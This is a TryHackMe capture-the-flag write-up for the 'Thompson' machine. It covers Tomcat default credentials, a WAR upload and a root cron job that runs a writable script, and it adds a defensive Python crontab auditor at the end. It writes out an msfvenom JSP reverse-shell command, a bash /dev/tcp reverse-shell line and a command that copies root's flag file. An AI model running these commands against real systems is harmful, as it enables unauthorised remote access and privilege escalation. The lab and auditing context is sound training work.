{THM} Thompson
Thompson is a TryHackMe machine originally for Bsides Guatemala.
As usual, we start by scanning for open ports with nmap and waiting for the result.
The scan shows three open ports: ssh, ajp13 and http (the web server on 8080). Next, let's run a directory scan against the HTTP service on 8080.
Some interesting results here. The manager directory is Tomcat's management application, which amounts to its admin interface. Let's check it out to confirm that.
This is the landing page on port 8080, the default Apache Tomcat page. Looking around the other resources, the version running here is out of date, so let's search for any exploit we can use.
In the meantime, let's look at the manager directory first.
We don't have any credentials yet, but something unusual happens. When I press Cancel on the login prompt, the 401 page that comes back contains very sensitive information: an example tomcat-users.xml configuration, complete with a username and password. The page itself is stock Tomcat; the danger is when an administrator copies that example into the real configuration and never changes it.
Further research confirms that these are the default credentials for Apache Tomcat. Hmm.
We're in. Just like that.
The version of Tomcat installed on the remote host is 8.5.x prior to 8.5.55. It is, therefore, affected by a remote code execution vulnerability, as referenced in the fixed_in_apache_tomcat_8.5.55_security-8 advisory.
We don't even need that vulnerability: with manager credentials, the manager application will deploy whatever we give it, so let's look for an upload function on this site.
We find a WAR file upload. But what is a WAR file?
A WAR file (Web Application Archive, sometimes expanded as Web Application Resource) is a file used to distribute a collection of JAR files, JavaServer Pages, Java Servlets, Java classes, XML files, tag libraries, static web pages (HTML and related files) and other resources that together constitute a web application. Tomcat unpacks and runs whatever is deployed, so a WAR containing a malicious JSP gives us code execution as the user Tomcat runs as.
Following HackTricks, we can create a WAR file with msfvenom. Let's create one and upload it to the site.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<machine> LPORT=<port> -f war -o war2.war
-p selects the payload type
LHOST is the attacker's machine (the address the shell connects back to)
LPORT is the port the attacker listens on
-f is the output format
-o is the output file name
Once done, let's upload it to the website.
Proof that our file has been deployed. Next, start the listener and click the new application's path in the manager list.
We've established a connection to our target.
As usual, before going further, make sure your shell is stable. Once that's done, let's enumerate more. I like to check these three things before proceeding any further:
Crontab
Passwd
Home directory
We get good information here. Let's check the profile and the user. Luckily, jack's user flag is readable by our low-privileged Tomcat user, which is a permissions problem in itself. Strange, but never mind.
From the crontab, a root cron job runs id.sh out of jack's home directory, and that script is writable by everyone. That means whatever command we put into id.sh runs with root permissions, so to escalate we can either throw a reverse shell or just copy out the flag.
echo " cp /root/root.txt /home/jack/r.txt " > id.sh
Wait a moment for the cron job to fire, and we get our copy of the file.
For a full root shell, start another listener and write a reverse shell into id.sh instead:
echo "/bin/bash -i >& /dev/tcp/machine/4430 0>&1" > id.sh
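The root cause here is a root cron entry that executes a script an unprivileged user can edit. The following is an added example, not part of the original writeup, of how to audit a system crontab for exactly that: it parses the job lines, resolves the files each command runs (including a leading `cd`), and flags any that are not root-owned or are group- or world-writable. The crontab text and file metadata are constructed samples that mimic the pattern on this box, not the real files; on a live host you would feed it `/etc/crontab` and the `stat_files()` helper instead.

```python
# Added example (not from the writeup): audit system crontab entries for
# root-run scripts that unprivileged users can modify.
import os
import posixpath
import pwd
import re
import shlex

# Constructed sample crontab in the style of the box; not the real file.
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * * root cd /home/jack && bash id.sh
@reboot root /usr/local/bin/backup.sh
"""

# Constructed metadata standing in for os.stat(): path -> (owner, mode bits).
SAMPLE_FILES = {
    "/etc/cron.hourly": ("root", 0o755),
    "/home/jack/id.sh": ("jack", 0o777),
    "/usr/local/bin/backup.sh": ("root", 0o755),
}

_SPECIAL = re.compile(r"^@(reboot|yearly|annually|monthly|weekly|daily|hourly)\s+(\S+)\s+(.+)$")
_STANDARD = re.compile(r"^(?:\S+\s+){5}(\S+)\s+(.+)$")


def parse_system_crontab(text):
    """Return (user, command) for each job line of a system-style crontab."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        # Skip blanks, comments and variable assignments such as PATH=...
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
            continue
        m = _SPECIAL.match(line)
        if m:
            jobs.append((m.group(2), m.group(3)))
            continue
        m = _STANDARD.match(line)
        if m:
            jobs.append((m.group(1), m.group(2)))
    return jobs


def referenced_paths(command):
    """Absolute paths a cron command executes or reads, honouring a leading 'cd'."""
    cwd = "/"
    paths = []
    for segment in re.split(r"&&|\|\||;", command):
        try:
            tokens = shlex.split(segment)
        except ValueError:           # unbalanced quotes: fall back to whitespace split
            tokens = segment.split()
        if not tokens:
            continue
        if tokens[0] == "cd":
            cwd = tokens[1] if len(tokens) > 1 else cwd
            continue
        for tok in tokens:
            if tok.startswith("-"):
                continue
            if tok.startswith("/"):
                paths.append(posixpath.normpath(tok))
            elif tok.endswith(".sh") or "/" in tok:
                paths.append(posixpath.normpath(posixpath.join(cwd, tok)))
    return paths


def audit(crontab_text, files):
    """(path, command, reason) for root jobs whose files a non-root user can change."""
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        for path in referenced_paths(command):
            meta = files.get(path)
            if meta is None:
                continue
            owner, mode = meta
            reasons = []
            if owner != "root":
                reasons.append(f"owned by {owner}")
            if mode & 0o002:
                reasons.append("world-writable")
            elif mode & 0o020:
                reasons.append("group-writable")
            if reasons:
                findings.append((path, command, ", ".join(reasons)))
    return findings


def stat_files(paths):
    """Real metadata for a live host, in the same shape as SAMPLE_FILES."""
    meta = {}
    for p in paths:
        try:
            st = os.stat(p)
        except OSError:
            continue
        meta[p] = (pwd.getpwuid(st.st_uid).pw_name, st.st_mode & 0o777)
    return meta


if __name__ == "__main__":
    # Demo on the constructed sample; on a live host pass open("/etc/crontab").read()
    # and stat_files(<paths from referenced_paths>) instead.
    for path, command, reason in audit(SAMPLE_CRONTAB, SAMPLE_FILES):
        print(f"{path}: {reason}  <- {command}")
```

On the sample it reports only `/home/jack/id.sh` (owned by jack, world-writable); the root-owned, mode 755 scripts pass. The same check is worth running over `/etc/cron.d/*` and the per-user spool, and a path that does not exist at all deserves its own finding, since a writable parent directory lets an attacker create the missing script.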
We have root privileges. Thanks for reading.
Takeaways:
Default credentials.
Misconfiguration that exposes sensitive data.
WAR file deployment as a path to code execution.
A root cron job running a script that unprivileged users can write.